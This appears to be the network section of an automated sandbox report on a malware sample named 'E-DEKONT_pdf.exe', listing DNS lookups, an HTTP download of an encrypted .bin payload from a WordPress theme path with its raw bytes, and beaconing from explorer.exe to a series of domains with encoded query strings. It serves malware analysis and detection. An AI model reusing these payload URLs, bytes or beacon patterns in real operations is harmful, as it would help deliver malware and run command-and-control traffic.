Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:17.354482889 CEST	1.1.1.1	192.168.11.20	0x3bbc	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:37.875994921 CEST	1.1.1.1	192.168.11.20	0x70ce	Server failure (2)	www.funtime28.online	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:38.233808994 CEST	9.9.9.9	192.168.11.20	0x70ce	No error (0)	www.funtime28.online	funtime28.online		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:07:38.233808994 CEST	9.9.9.9	192.168.11.20	0x70ce	No error (0)	funtime28.online		195.179.237.158	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:07:58.729476929 CEST	1.1.1.1	192.168.11.20	0x3a41	No error (0)	www.couragetokingdom.com	couragetokingdom.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:07:58.729476929 CEST	1.1.1.1	192.168.11.20	0x3a41	No error (0)	couragetokingdom.com		122.201.64.145	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:08:19.781344891 CEST	1.1.1.1	192.168.11.20	0x4152	No error (0)	www.peterslawonline.com		23.27.72.143	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:08:40.651892900 CEST	1.1.1.1	192.168.11.20	0x575b	Server failure (2)	www.kevinjasperinc.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:08:40.870115042 CEST	9.9.9.9	192.168.11.20	0x575b	Server failure (2)	www.kevinjasperinc.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:09:01.033582926 CEST	1.1.1.1	192.168.11.20	0x5fef	No error (0)	www.bestpetfinds.com		112.196.98.174	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:09:22.026799917 CEST	1.1.1.1	192.168.11.20	0x77b8	No error (0)	www.anjin98.com		160.121.87.199	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:09:42.707878113 CEST	1.1.1.1	192.168.11.20	0x9c5f	No error (0)	www.bizformspro.com	bizformspro.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:09:42.707878113 CEST	1.1.1.1	192.168.11.20	0x9c5f	No error (0)	bizformspro.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:03.019469976 CEST	1.1.1.1	192.168.11.20	0x41d1	No error (0)	www.lapalmaaccesible.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:10:03.019469976 CEST	1.1.1.1	192.168.11.20	0x41d1	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:10:03.019469976 CEST	1.1.1.1	192.168.11.20	0x41d1	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:23.570672035 CEST	1.1.1.1	192.168.11.20	0x20ca	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:25.182771921 CEST	9.9.9.9	192.168.11.20	0x20ca	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:25.489774942 CEST	9.9.9.9	192.168.11.20	0x20ca	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:10:43.340749025 CEST	1.1.1.1	192.168.11.20	0x2440	No error (0)	www.edelman-production.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 27, 2023 14:10:43.340749025 CEST	1.1.1.1	192.168.11.20	0x2440	No error (0)	ghs.googlehosted.com		142.250.181.243	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:11:33.337788105 CEST	1.1.1.1	192.168.11.20	0xc008	No error (0)	www.credit-cards-54889.com		185.53.179.91	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:11:45.499573946 CEST	1.1.1.1	192.168.11.20	0x51d3	No error (0)	www.licensescape.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:12:05.752736092 CEST	1.1.1.1	192.168.11.20	0xf60e	No error (0)	www.emiu6696.com		202.95.14.233	A (IP address)	IN (0x0001)	false
Mar 27, 2023 14:12:26.460947990 CEST	1.1.1.1	192.168.11.20	0x8892	No error (0)	www.dinero.news		64.190.63.111	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

34.138.169.8

www.goodlifeprojectofficial.com

www.anotherworldrecord.com

www.crosswalkconsulting.co.uk

www.funtime28.online

www.couragetokingdom.com

www.peterslawonline.com

www.bestpetfinds.com

www.anjin98.com

www.bizformspro.com

www.lapalmaaccesible.com

www.edelman-production.com

www.credit-cards-54889.com

www.licensescape.com

www.emiu6696.com

www.dinero.news

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49839	34.138.169.8	80	C:\Users\user\Desktop\E-DEKONT_pdf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:05:11.349328995 CEST	227	OUT	GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 34.138.169.8 Cache-Control: no-cache
Mar 27, 2023 14:05:11.490650892 CEST	229	IN	HTTP/1.1 200 OK Date: Mon, 27 Mar 2023 12:05:11 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1n Last-Modified: Tue, 21 Mar 2023 22:37:46 GMT ETag: "2e640-5f770b150a4e5" Accept-Ranges: bytes Content-Length: 190016 Content-Type: application/octet-stream Data Raw: ee c1 3a 56 68 91 54 04 6d 29 61 8f a0 97 9f 6f e2 1d 3c 3e f0 c1 f3 d6 08 75 33 de a3 b4 39 f2 60 3a ec 4c 90 62 3f e2 71 25 67 d1 d4 4a 07 fc 15 ac 43 da e3 00 7b 52 84 5a a4 39 ff a1 5f c8 c1 82 a6 c5 86 6a 11 9b 88 16 a2 d7 bd dc c6 13 ad 20 c0 98 ac 98 ea 0d eb 22 56 59 41 0b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e de 33 d1 36 42 13 28 49 2c 6e 80 b6 90 a1 9b cc 6a 23 a8 76 35 92 45 ae ab 31 34 b6 60 74 ca 46 58 59 4e a8 d4 8a 37 18 66 34 52 4f a5 35 e5 1f c3 0d b5 64 61 c4 0c f7 37 7d f1 55 b8 2e 8f 60 30 af 6d 09 44 e4 bc 8a 19 99 0f e2 64 ad 4b c0 32 10 0a af 71 20 c4 51 af 91 ad b8 34 a5 a8 e3 4c 4d 8f 3a 79 14 d8 db 81 c4 00 7a 2a 76 33 58 d3 f7 42 32 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 56 38 13 b6 4a 25 e6 94 ff 61 0a 11 99 fe cd e2 20 1e 89 03 1c 74 fc f0 30 4d f6 4c 23 e4 01 ef 87 fa 7f e3 5b 04 a9 09 16 fc e2 ea 14 c9 7f 82 b8 59 2a 83 40 78 37 9c 7d e8 d6 b2 bd 4a fe db 06 62 b4 4b 44 34 3a 5a fd e0 6a 81 e0 99 ac 37 e6 c9 0a 55 51 cd 2e 7e 8b eb e8 8b 5c 65 0f 72 00 38 7e 32 61 e9 7e 4f 5c ad 3e a1 cf c1 71 b2 d9 33 cc e1 6e c9 9a 3f ee 06 3f 9f ba 23 f3 a3 7d f1 dc 66 52 93 12 06 0a 35 9c f7 60 02 02 cb dd bd 4f 70 e2 01 bd 76 93 2a a7 1f 95 3b 3c f5 94 1b 04 a1 78 c2 05 75 06 4c 37 19 e3 7f c4 12 e9 cf 49 be 7b b5 b0 2a 47 cf 89 54 ab 8f b7 bb 4d 23 e0 22 46 4d 62 28 8b 74 67 f7 07 17 42 cd 69 06 f7 75 eb dd ab af 54 52 5e da 25 eb c9 70 1d 7c 27 a1 83 e6 20 06 88 a4 d1 13 6a 73 92 12 19 d0 c1 3d e4 dd ff b4 d5 24 f6 37 a5 ce 60 8f 3c e0 1a d1 b4 54 96 59 f2 87 ae 7d 48 74 9e e7 5f 26 36 c9 58 a4 f1 07 4e c2 3e b9 86 49 b7 b5 71 2c b5 32 44 1e e4 67 2b f7 a4 09 2c 2b 0f 91 a9 02 42 ef 0a 8c 20 08 fe d1 34 c7 a0 f9 46 dd 3c ea ee d8 78 91 1a f7 69 0c 05 8c 91 4a 22 12 8e 7c aa 91 a6 90 ac 50 33 ea 4f 6b 07 71 c8 34 73 b3 63 fa ff ce 7c 19 db 29 e4 77 96 64 03 d0 b9 6b 03 5d 1a 1d ff 5e 1b 9f b2 54 d1 0e 98 aa f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce d0 14 31 f2 98 52 1b e0 57 09 bf cc 54 62 3d d2 18 8a 49 d3 bb 59 32 e2 79 a8 c5 bf b8 46 9f 31 75 00 89 2a 6e da 4d 3a 89 73 ba 21 24 32 ce 30 62 19 8b 73 82 75 73 90 ba 3a 8c 29 4d 21 0e 29 39 87 7b a3 74 6f 72 f3 e3 f0 f3 98 30 11 63 31 76 b1 77 ab 38 f7 36 82 1a 3e ab e6 f0 19 f6 25 d3 14 2d 89 73 fe be d5 a6 e9 29 9b 2c f6 01 7a e9 c9 d5 ec 16 6a f5 6a c7 91 96 3f 07 d5 d9 05 4f 48 8a b0 7c b7 40 07 b8 8f 0f f1 d5 08 90 ac 18 b4 d8 57 7e 0b b4 31 ff 5d f2 8f 94 73 82 a9 45 72 ec 96 44 06 e4 ea 3c 20 20 da 1b 96 a4 4b 1f 8c d8 e3 97 6e 6a 11 9b 88 4e 21 3f b4 57 0e 90 6d 1c 4b 98 af 59 69 cd c3 21 5e a6 a0 9b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e 1e 33 d1 36 4c 0c 92 47 2c da 89 7b b1 19 9a 80 a7 02 fc 1e 5c e1 65 de d9 5e 53 c4 01 19 ea 25 39 37 20 c7 a0 aa 55 7d 46 46 27 21 85 5c 8b 3f 87 42 e6 44 0c ab 68 92 19 70 fc 5f 9c 2e 8f 60 30 Data Ascii: :VhTm)ao<>u39`:Lb?q%gJC{RZ9_j "VYA?M3t,w;}36B(I,nj#v5E14`tFXYN7f4RO5da7}U.`0mDdK2q Q4LM:yzv3XB2/O>ytlu@;iV8J%a t0ML#[Y@x7}JbKD4:Zj7UQ.~\er8~2a~O\>q3n??#}fR5`Opv;<xuL7I{GTM#"FMb(tgBiuTR^%p\|' js=$7`<TY}Ht_&6XN>Iq,2Dg+,+B 4F<xiJ"\|P3Okq4sc\|)wdk]^TeK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH\|@W~1]sErD< KnjN!?WmKYi!^?M3t,w;}36LG,{\e^S%97 U}FF'!\?BDhp_.`0
Mar 27, 2023 14:05:11.490709066 CEST	230	IN	Data Raw: af 6d 09 ef 18 b4 60 f6 04 69 5b 8b 30 2d 79 dd 8d 6c 16 85 20 09 e8 06 0c cb 01 c0 a5 50 5a a0 d0 e9 83 8d 14 23 62 6f 59 66 c3 78 1f 50 30 3c 6a 24 8b 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd Data Ascii: m`i[0-yl PZ#boYfxP0<j$/O>ytlu@;i}$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv*;<xuL7
Mar 27, 2023 14:05:11.490747929 CEST	231	IN	Data Raw: f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce Data Ascii: eK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH\|@W~1]sE
Mar 27, 2023 14:05:11.490786076 CEST	233	IN	Data Raw: 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd e2 20 1e 89 03 fc 74 fe f1 3b 4c fc 4c 23 30 03 ef 87 fa 7f e3 5b 04 a9 09 06 0e e3 ea 14 d9 7f 82 b8 a9 28 83 40 78 77 9c 7d f8 d6 b2 bd 48 fe db 03 62 b5 4b 44 34 3a 5a f8 e0 6b 81 e0 99 ac 37 e6 39 Data Ascii: }$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv;<xuL7I{GTM#"FMb(tgBiuTR^%p\|' js
Mar 27, 2023 14:05:11.490819931 CEST	234	IN	Data Raw: 1c c4 69 79 41 22 d6 a4 2f 36 d7 61 f2 c9 22 5b 59 c1 7b 8f d9 4e 14 de 4e bb 45 1b 6a be 16 1c 03 1e df e5 02 b9 07 24 6b e0 77 7f 06 78 64 fe ec 02 6f 7a 51 00 2a 0a 9f 9e 72 af 6f d6 67 e9 e0 0e b3 8d f1 94 90 ba 3a da a2 7f a8 7b c5 b2 f5 7f Data Ascii: iyA"/6a"[Y{NNEj$kwxdozQrog:{{gEr%_B\^9x/+m{O<z?RDl\|4}Z7/lNme"wfaChPny*)b^]OL94jv@-b
Mar 27, 2023 14:05:11.490852118 CEST	235	IN	Data Raw: ce 2c cf c5 a5 6e 92 19 65 27 1c c0 cc 19 c6 53 95 91 54 e9 fb fb 10 17 74 9c d2 f8 86 c7 bd 1a c9 9e 06 62 b2 a1 4c e9 24 b7 2a 8e 4d 77 a0 5f dc b9 4c e6 c4 11 f9 55 b9 9c 6f 34 26 fd 0a 23 99 08 a5 24 6a cd b0 18 0c 9f fd 43 f4 e2 c3 88 f5 6a Data Ascii: ,ne'STtbL$Mw_LUo4&#$jCjBPRkKmAKz.JEJDN3tHDytoHxM!$+q>/(81KldK5ka:!M=`zepPJlWr`?5jw
Mar 27, 2023 14:05:11.490886927 CEST	237	IN	Data Raw: 89 7e 65 57 3f 56 71 d6 b2 57 d5 f2 94 40 fe d3 89 90 8d c8 03 10 28 5f b5 65 9e ce 89 e7 45 99 5c 30 b3 fa e7 c1 54 a8 ca 23 82 e2 56 68 d0 76 8c e0 b4 df b2 2e ac 1b d1 09 fe a1 a0 80 47 2b 93 ee 08 95 38 9b 90 39 0b 12 5c 8d b2 b7 75 dc 58 93 Data Ascii: ~eW?VqW@(_eE\0T#Vhv.G+89\uX=s]Kl=mHV?Ear5:%hs_OK%2ggsubz(nYDBW7q..Z_1Nl;!n3>J-^@.TW
Mar 27, 2023 14:05:11.490921974 CEST	238	IN	Data Raw: e5 f9 f5 71 54 3e ee c5 87 bb 2a 42 b0 1a 6b c3 c8 b1 16 5e 50 e0 6a 43 45 7b 60 dc 81 d9 8f 3d fa 1e 38 14 ae de 66 03 33 ed 16 12 38 07 5c 72 35 aa b0 30 76 e2 e4 6e 09 7c c8 a7 17 dd b9 5a cf a0 7b b3 e2 7f f0 e8 bd ab c5 26 3e b2 6e 51 5c 50 Data Ascii: qT>*Bk^PjCE{`=8f38\r50vn\|Z{&>nQ\PdX,L9C0&D"TRpwgS?/ 6 _lQHKc!^bP{e8_-k`npKqRW)Hcw,~Raa6t
Mar 27, 2023 14:05:11.490959883 CEST	239	IN	Data Raw: 48 00 14 e6 c6 f8 2a 1e 4b 06 cf 4d 35 08 4e bf f8 79 5e 37 28 12 8d e8 55 e7 4b 26 f5 b4 87 73 b4 83 a4 0d 70 a2 78 56 31 82 f7 6c 6f bb f9 2b 6b c9 86 e7 5f 9f 6f 5b b4 37 52 a2 46 50 eb e2 e8 64 77 68 af 88 6e 90 8b 1c 94 e3 b4 3c 10 f4 56 0a Data Ascii: H*KM5Ny^7(UK&spxV1lo+k_o[7RFPdwhn<VFY_FZXsuy'CZE5XMkG$^9\;GkYUrxfl&#r7RbY/$3<q3GIEz
Mar 27, 2023 14:05:11.490993977 CEST	241	IN	Data Raw: 65 26 30 42 93 0d aa b5 ec 30 30 63 4a 59 60 9a 95 1b 56 d5 5f 2f 03 da 39 b7 37 2f 92 02 c1 cd 30 36 be 5f f6 55 57 81 32 38 0a 0c 1a ba 28 e7 25 4c 21 16 8b c0 c8 b9 28 69 16 f1 e0 8b 70 37 da 6b 38 e0 0b 29 85 51 e1 73 65 f2 bc 4f 1c 89 87 8e Data Ascii: e&0B00cJY`V_/97/06_UW28(%L!(ip7k8)QseOEw4s=>#"mJ-#y=) 0@@MI9zNoqeSqw3mr6zKD90Dk=c\4x_c0i]iXwOqM SE
Mar 27, 2023 14:05:11.631695986 CEST	242	IN	Data Raw: 4e aa 43 0c 53 cf 57 65 2f 94 13 d2 b5 a8 32 db a0 b9 59 a0 9b db bb 63 25 49 47 f7 76 00 2d 34 23 44 e8 fe 66 4e 2e ad 69 00 12 6f fc 27 80 1c ca e9 05 62 8b d5 b7 af f3 92 47 2c 51 d5 e3 b5 d8 55 90 66 c9 f4 2d a7 6a 38 32 58 bd ac c4 01 19 61 Data Ascii: NCSWe/2Yc%IGv-4#DfN.io'bG,QUf-j82Xay3hBwp3lP&`eW=#0- c{$'I@$/=}ds(}=ZUv$8jtG~0Foj&"t>\|Smy5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49841	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:05:56.009341955 CEST	436	OUT	GET /mi94/?uZgtA=Omatd+gu8nRqk8Gn1x/OOoOdl/68z9YaBlXV3mZwE7pdVLuvsR/X9VlgKTB3ZiBvgeg4&G6GdR=axl0 HTTP/1.1 Host: www.goodlifeprojectofficial.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:05:56.149992943 CEST	437	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Mon, 27 Mar 2023 12:05:56 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: WXGLpcyc/AF5GeXJf Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Mar 27, 2023 14:05:56.150063992 CEST	438	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Mar 27, 2023 14:05:56.150120020 CEST	440	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Mar 27, 2023 14:05:56.150163889 CEST	440	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Mar 27, 2023 14:05:56.150218964 CEST	441	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Mar 27, 2023 14:05:56.150273085 CEST	443	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
